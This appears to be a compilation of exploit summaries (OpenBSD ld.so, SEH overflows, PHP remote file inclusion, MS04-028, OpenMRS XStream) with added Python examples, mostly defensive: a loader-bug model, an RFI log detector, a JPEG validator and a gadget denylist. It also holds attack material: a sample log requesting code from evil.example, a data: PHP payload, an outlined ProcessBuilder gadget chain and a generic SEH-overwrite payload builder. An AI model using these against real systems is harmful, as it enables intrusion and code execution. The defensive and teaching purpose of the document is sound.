This module uses the Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges via its `root` command. It has been tested successfully with Reptile from the `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).
This module exploits a vulnerability in the OpenBSD ld.so dynamic loader (CVE-2019-19726). The `_dl_getenv()` function fails to reset the `LD_LIBRARY_PATH` environment variable when its value consists of approximately ARG_MAX colons. This can be abused to load `libutil.so` from an untrusted path, using `LD_LIBRARY_PATH` in combination with the set-uid `chpass` executable, resulting in privileged code execution. This module has been tested successfully on OpenBSD 6.1 (amd64) and OpenBSD 6.6 (amd64).
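The bug class behind this entry is an ordering problem: a set-uid-aware loader must drop untrusted loader variables before it does anything with their values, or a value crafted to break the "parse" step skips the reset. The following is an added example, not ld.so's source: a model loader with the unsafe ordering beside the hardened one, resolving `libutil.so` against a constructed in-memory filesystem. The entry cap, the fake filesystem and the attack value (a real directory followed by ARG_MAX-many colons) are assumptions for the illustration.

```python
# Added example: model of the check-ordering bug class behind CVE-2019-19726,
# not ld.so's code. The cap, "filesystem" and environment below are constructed.

import itertools

MAX_PATH_ENTRIES = 1024                     # assumed cap, stands in for an allocator limit
ARG_MAX = 256 * 1024                        # assumed ARG_MAX for the attack value
SYSTEM_DIRS = ["/usr/lib"]
FAKE_FS = {                                 # constructed: path -> exists
    "/usr/lib/libutil.so": True,
    "/tmp/evil/libutil.so": True,
}


def split_search_path(value):
    """Eagerly materialise a colon-separated search path; fails when the entry
    count is absurd, the way allocating N pointers for it would."""
    entries = value.split(":")
    if len(entries) > MAX_PATH_ENTRIES:
        raise MemoryError("too many search-path entries")
    return entries


def iter_search_path(value):
    """Lazily walk the same path one entry at a time: no allocation, no failure."""
    start = 0
    while True:
        end = value.find(":", start)
        if end == -1:
            yield value[start:] or "."
            return
        yield value[start:end] or "."
        start = end + 1


def unsafe_scrub(env, trusted):
    """Buggy ordering: LD_LIBRARY_PATH is parsed first, and only dropped for an
    untrusted (set-uid) process on the path where parsing succeeded."""
    env = dict(env)
    value = env.get("LD_LIBRARY_PATH")
    if value is not None:
        try:
            split_search_path(value)
        except MemoryError:
            return env                       # bails out early: the variable survives
        if not trusted:
            del env["LD_LIBRARY_PATH"]
    return env


def safe_scrub(env, trusted):
    """Hardened ordering: an untrusted process loses every loader variable before
    any value is looked at, so no parse outcome can skip the reset."""
    env = dict(env)
    if not trusted:
        for var in ("LD_LIBRARY_PATH", "LD_PRELOAD"):
            env.pop(var, None)
    return env


def resolve_library(env, name, scrub, trusted):
    """Search LD_LIBRARY_PATH (as left by `scrub`), then the system directories."""
    env = scrub(env, trusted)
    user_dirs = iter_search_path(env["LD_LIBRARY_PATH"]) if "LD_LIBRARY_PATH" in env else []
    for directory in itertools.chain(user_dirs, SYSTEM_DIRS):
        candidate = f"{directory}/{name}"
        if FAKE_FS.get(candidate):
            return candidate
    return None


# Constructed attack value: attacker directory first, then ~ARG_MAX empty entries.
ATTACK_ENV = {"LD_LIBRARY_PATH": "/tmp/evil" + ":" * ARG_MAX}
BENIGN_ENV = {"LD_LIBRARY_PATH": "/tmp/evil"}
```

With the benign value both scrubs behave the same for a set-uid process (the attacker directory is ignored); with the padded value only `safe_scrub` still ends up loading the system copy. The general lesson is that a security reset must not sit behind any step whose failure the attacker controls.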
Prime95 version 29.8 build 6 is vulnerable to an SEH-based buffer overflow. The exploit is a Python script that writes a malicious file; copying the file's contents to the clipboard and pasting them into specific fields of the Prime95.exe application overwrites the Structured Exception Handler record and executes the embedded payload, which opens a bind shell on port 3110 and gives the attacker remote command execution. The overwritten handler lives in the libhwloc-15.dll library. The shellcode was generated with msfvenom for the Windows platform with the characters that break the paste path excluded. The exploit has been tested on Windows 7 x64.
The vulnerability allows an attacker to include a remote file by supplying a URL in the 'loadadminpage' parameter of 'index.php', whose value is passed unvalidated to a PHP include. Because the included file is executed as PHP, this remote file inclusion (RFI) leads to remote code execution and compromise of the target system. Remote inclusion over a URL only works when PHP's `allow_url_include` setting is enabled.
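From the defender's side the entry above describes a pattern that is easy to spot in web-server logs: a file-name parameter carrying a URL scheme or PHP stream wrapper. The detector below is an added example, not code from the advisory or the affected application; the access-log lines are constructed in Apache combined format, the parameter name comes from the entry, and the list of schemes is a starting point rather than a complete one.

```python
# Added example (not from the original advisory): flag remote-file-inclusion
# attempts against a `loadadminpage` parameter in web-server access logs.
# Log lines are constructed; schemes listed are standard PHP URL/stream wrappers.

import re
from urllib.parse import parse_qsl, unquote, urlsplit

PARAM = "loadadminpage"
# Schemes and wrappers that make a PHP include fetch or synthesise code
# instead of opening a local file (assumed starting list, extend as needed).
REMOTE_SCHEMES = ("http:", "https:", "ftp:", "ftps:", "php:", "data:", "expect:")

LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def is_remote_include(value):
    """True when the parameter value would make a PHP include fetch remote or
    wrapper-generated code rather than open a local file name. The value is
    decoded once more to catch double-encoded schemes; for detection that
    over-decoding is acceptable."""
    decoded = unquote(value).strip().lower()
    return decoded.startswith(REMOTE_SCHEMES)


def scan_access_log(lines):
    """Return (client_ip, parameter value) for every request to index.php whose
    loadadminpage parameter points at a remote URL or stream wrapper."""
    hits = []
    for line in lines:
        match = LOG_RE.search(line)
        if not match:
            continue
        parts = urlsplit(match.group("target"))
        if not parts.path.endswith("/index.php"):
            continue
        for key, value in parse_qsl(parts.query, keep_blank_values=True):
            if key == PARAM and is_remote_include(value):
                hits.append((line.split()[0], value))
    return hits


SAMPLE_LOG = [  # constructed lines in Apache combined format
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?loadadminpage=settings HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Oct/2023:13:55:40 +0000] "GET /index.php?loadadminpage=http://evil.example/shell.txt HTTP/1.1" 200 1337 "-" "curl/7.88"',
    '198.51.100.7 - - [10/Oct/2023:13:55:41 +0000] "GET /index.php?loadadminpage=data%3A%2F%2Ftext%2Fplain%3Bbase64%2CPD9waHAgcGhwaW5mbygpOw%3D%3D HTTP/1.1" 200 1337 "-" "curl/7.88"',
    '192.0.2.9 - - [10/Oct/2023:13:56:02 +0000] "GET /admin/index.php?loadadminpage=users&sort=asc HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]
```

The `data:` wrapper case matters because it needs no attacker-hosted file at all: the PHP source travels inside the request. A 200 response to such a request is the signal to treat the host as compromised, not merely probed.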
This is a shellcoded exploit for the Windows JPEG GDI+ overflow vulnerability (MS04-028). The payload is generic Win32 HTTP download-and-execute shellcode that fetches and runs arbitrary code on a vulnerable system. The shellcode is built to avoid the JPEG end-of-image marker (0xFF 0xD9), which would otherwise terminate the image early, and is approximately 2500 bytes in size.
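Two checks fall out of the entry above: a decoder must validate the two-byte segment length field of a JPEG marker (it counts itself, so anything below 2 is malformed, and a decoder that subtracts 2 before checking underflows), and a payload embedded in the image must not contain the FF D9 end-of-image marker. The walker and checker below are an added example, not the exploit's code; the sample image, the placeholder payload bytes and the marker table are constructed here from the JPEG marker layout.

```python
# Added example (not the exploit's code): walk JPEG marker segments, reject a
# malformed length field, and verify an embedded payload contains no EOI marker.
# The image and payload bytes are constructed placeholders.

import struct

SOI, EOI, SOS, COM = 0xD8, 0xD9, 0xDA, 0xFE
# Markers that carry no length field: TEM, RSTn, SOI, EOI.
STANDALONE = {0x01, SOI, EOI} | set(range(0xD0, 0xD8))


def walk_segments(data):
    """Return [(marker, payload)] up to and including SOS or EOI.
    Raises ValueError on structure a decoder must not trust."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("missing SOI")
    pos, segments = 2, []
    while pos < len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected marker at offset {pos}")
        marker = data[pos + 1]
        if marker == 0xFF:                # fill bytes before a marker are legal
            pos += 1
            continue
        pos += 2
        if marker in STANDALONE:
            segments.append((marker, b""))
            if marker == EOI:
                break
            continue
        if pos + 2 > len(data):
            raise ValueError("truncated length field")
        length = struct.unpack(">H", data[pos:pos + 2])[0]
        # The length includes its own two bytes, so a value below 2 is
        # malformed; checking before subtracting avoids the underflow.
        if length < 2:
            raise ValueError(f"marker 0x{marker:02X} has invalid length {length}")
        payload = data[pos + 2:pos + length]
        if len(payload) != length - 2:
            raise ValueError("segment runs past end of file")
        segments.append((marker, payload))
        pos += length
        if marker == SOS:                 # entropy-coded data follows; stop here
            break
    return segments


def is_well_formed(data):
    try:
        walk_segments(data)
        return True
    except ValueError:
        return False


def eoi_positions(blob):
    """Offsets of FF D9 inside a payload; must be empty for embedded shellcode."""
    hits, idx = [], blob.find(b"\xff\xd9")
    while idx != -1:
        hits.append(idx)
        idx = blob.find(b"\xff\xd9", idx + 1)
    return hits


def comment_segment(payload):
    """Wrap bytes in a COM segment with a correct length field."""
    return bytes([0xFF, COM]) + struct.pack(">H", len(payload) + 2) + payload


# Constructed inputs: placeholder payloads and a minimal SOI / COM / EOI image.
CLEAN_PAYLOAD = b"\x90" * 16 + b"\xcc\xff\xd8\x41"      # has FF D8, never FF D9
BAD_PAYLOAD = b"\x90" * 8 + b"\xff\xd9" + b"\x90" * 8     # FF D9 at offset 8
SAMPLE_JPEG = b"\xff\xd8" + comment_segment(CLEAN_PAYLOAD) + b"\xff\xd9"
MALFORMED_JPEG = b"\xff\xd8" + bytes([0xFF, COM]) + b"\x00\x01" + b"\xff\xd9"
```

A length-delimited walker like this one is not fooled by FF D9 inside a well-formed segment, but entropy-coded data after SOS is scanned byte-wise and any FF not followed by 00 is a marker there; the `eoi_positions` check is the minimum a payload destined for that region has to pass.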
A null pointer dereference exists in the WARPGPUCMDSYNC function of the BasicRender.sys driver. An unprivileged user can trigger the vulnerability to crash the system, denying service to all other users.
The Vulnerability Laboratory core research team discovered a local kiosk privilege escalation vulnerability in the Deutsche Bahn ticket vending machine series running Windows XP.
This exploit triggers a denial of service vulnerability in SurfOffline Professional version 2.2.0.103. By providing a specially crafted payload as the 'Project Name' parameter, an attacker can overwrite the Structured Exception Handler (SEH) record and crash the program.
FTP Navigator 8.03 is vulnerable to a denial of service (DoS) when a specially crafted payload is entered in the 'Custom Command' input box. The input overwrites the Structured Exception Handler (SEH) record and crashes the program; since the handler address is attacker-controlled, the same overwrite can potentially lead to arbitrary code execution.
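The Prime95, SurfOffline and FTP Navigator entries above share one set of mechanics: find the offset at which input lands in the SEH record, replace the handler with a pop/pop/ret address, and put a short jump in the next-SEH slot that lands on the shellcode. The following is an added example of those mechanics, not the code of any of the three exploits: a Metasploit-style cyclic pattern generator, the offset lookup from the dword seen in the handler field, and a buffer builder that refuses bad characters. The offset, the pop/pop/ret address and the shellcode bytes used in the tests are placeholders, not values from the affected programs.

```python
# Added example (not from any of the listed exploits): generic SEH-overwrite
# mechanics. Offsets, addresses and shellcode used below are placeholders.

import string
import struct


def pattern_create(length):
    """Metasploit pattern_create: 'Aa0Aa1Aa2...' where every 3-byte window is
    unique for up to 20280 bytes."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("pattern longer than 20280 bytes is not unique")


def pattern_offset(pattern, value):
    """Offset of the 4 bytes that landed in the SEH handler slot. `value` may
    be the dword as a debugger shows it (interpreted little-endian) or the
    raw 4 bytes in memory order."""
    needle = struct.pack("<I", value) if isinstance(value, int) else value
    idx = pattern.find(needle)
    if idx == -1:
        raise ValueError("value not found in pattern")
    return idx


def build_seh_payload(nseh_offset, pop_pop_ret, shellcode,
                      badchars=b"\x00\x0a\x0d", total_len=None):
    """Layout: junk | nSEH (jmp +6) | SEH (pop/pop/ret) | nop sled | shellcode.

    nseh_offset: bytes of filler before the next-SEH pointer.
    pop_pop_ret: address of a pop/pop/ret gadget in a non-SafeSEH module.
    Every controlled byte after the filler is checked against `badchars`;
    the filler itself is 'A' and never contains them."""
    nseh = b"\xeb\x06\x90\x90"               # short jump over the 4-byte handler
    seh = struct.pack("<I", pop_pop_ret)
    body = nseh + seh + b"\x90" * 8 + shellcode
    bad = sorted({b for b in body if b in badchars})
    if bad:
        raise ValueError("bad characters in controlled bytes: "
                         + " ".join(f"\\x{b:02x}" for b in bad))
    buf = b"A" * nseh_offset + body
    if total_len is not None:
        if len(buf) > total_len:
            raise ValueError("payload does not fit in total_len")
        buf += b"D" * (total_len - len(buf))
    return buf


def seh_layout(buf, nseh_offset):
    """Split a built buffer back into its fields for inspection."""
    return {
        "nseh": buf[nseh_offset:nseh_offset + 4],
        "seh": struct.unpack("<I", buf[nseh_offset + 4:nseh_offset + 8])[0],
        "after": buf[nseh_offset + 8:],
    }
```

The bad-character check is applied to everything after the filler because the handler address is just four more bytes that must survive the input path; an address containing a byte the target strips or translates (a NUL in a GUI text field, CR/LF in a command box) is as useless as shellcode containing one.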
OpenMRS is an open-source platform that supplies users with a customizable medical record system. There exists an object deserialization vulnerability in the `webservices.rest` module used in OpenMRS Platform. Unauthenticated remote code execution can be achieved by sending a malicious XML payload to a REST API endpoint such as `/ws/rest/v1/concept`. This module uses an XML payload generated with Marshalsec that uses the ImageIO gadget chain, which XStream unmarshals into JDK `javax.imageio` classes ending in a `java.lang.ProcessBuilder` call. Tested on OpenMRS Platform `v2.1.2` and `v2.21` with Java 8 and Java 9.
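XStream maps XML element names and `class` attributes directly to Java types, which is why an unauthenticated document can reach `ProcessBuilder`. The check below is an added example, neither OpenMRS nor Marshalsec code: it inspects a document before unmarshalling and rejects any reference to types used by the public XStream ImageIO and dynamic-proxy gadget chains. The denylist is an assumption to be extended, the sample documents are constructed and only sketch the chain's shape, and a prefilter like this is a stopgap next to XStream's own allowlist security framework and an upgraded OpenMRS.

```python
# Added example (not OpenMRS or Marshalsec code): reject XStream input that
# names known gadget types before it is unmarshalled. Denylist and samples are
# constructed assumptions.

import xml.etree.ElementTree as ET

# Types from the public ImageIO and EventHandler gadget chains (assumed list).
DENIED_TYPES = {
    "java.lang.ProcessBuilder",
    "java.lang.Runtime",
    "javax.imageio.ImageIO$ContainsFilter",
    "javax.imageio.spi.FilterIterator",
    "java.beans.EventHandler",
    "jdk.nashorn.internal.objects.NativeString",
}
# XStream-specific element that builds a java.lang.reflect.Proxy.
DENIED_ELEMENTS = {"dynamic-proxy"}


def gadget_types_in(xml_bytes):
    """Sorted list of denied names the document references, looking at both
    tag names (XStream's default type mapping) and `class` attributes (its
    explicit-type mapping). Unparseable input counts as a hit so that it is
    rejected rather than handed to a more lenient parser."""
    try:
        root = ET.fromstring(xml_bytes)
    except ET.ParseError:
        return ["<unparseable>"]
    found = set()
    for element in root.iter():
        if element.tag in DENIED_TYPES or element.tag in DENIED_ELEMENTS:
            found.add(element.tag)
        cls = element.get("class")
        if cls in DENIED_TYPES:
            found.add(cls)
    return sorted(found)


def should_unmarshal(xml_bytes):
    """Gate to place in front of the REST endpoint's XStream call."""
    return not gadget_types_in(xml_bytes)


# Constructed samples: a benign concept document and the outline of the
# ImageIO chain (class names only; not a working payload).
BENIGN_CONCEPT = b"<concept><names><name><name>Aspirin</name></name></names></concept>"
GADGET_SHAPE = b"""<map><entry>
  <jdk.nashorn.internal.objects.NativeString>
    <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
      <dataHandler><dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
        <is class="javax.imageio.spi.FilterIterator">
          <filter class="javax.imageio.ImageIO$ContainsFilter"><name>start</name></filter>
          <next class="java.lang.ProcessBuilder"><command><string>id</string></command></next>
        </is>
      </dataSource></dataHandler>
    </value>
  </jdk.nashorn.internal.objects.NativeString>
</entry></map>"""
PROXY_SHAPE = b"<sorted-set><dynamic-proxy><interface>java.lang.Comparable</interface></dynamic-proxy></sorted-set>"
```

Reject, never sanitize: stripping the offending elements and passing the rest on invites parser-differential bypasses, since XStream parses the document with its own reader rather than the one used here. The durable fix is to let XStream accept only the types the endpoint actually expects.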